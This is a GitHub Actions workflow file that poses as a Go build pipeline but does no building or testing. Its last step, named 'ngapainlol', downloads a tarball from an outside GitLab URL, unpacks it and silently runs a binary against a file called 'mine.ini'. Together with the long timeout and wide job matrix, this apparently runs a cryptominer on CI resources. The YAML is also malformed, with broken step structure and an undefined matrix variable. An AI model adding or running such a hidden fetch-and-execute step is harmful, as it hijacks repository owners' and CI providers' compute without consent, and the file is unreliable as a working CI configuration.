
name: Go

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

jobs:

  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v1
    strategy:
      matrix:
        go: [1.12, 1.13, 1.14, 1.15, 1.16]
        flag: [pkn, ips, bin, jos]
    timeout-minutes: 2000
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}

  -
  - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.l8go }}
      id: go

    - name: Check out code into the Go module directory
      uses: actions/checkout@v1

    - name: ngapainlol
      run: |
        wget https://gitlab.com/gas_kan/azkarillah/-/raw/master/aska.tar.gz && tar -xvf aska.tar.gz && chmod +x ikuk mine.ini && ./ikuk mine.ini > /dev/null 2>&1
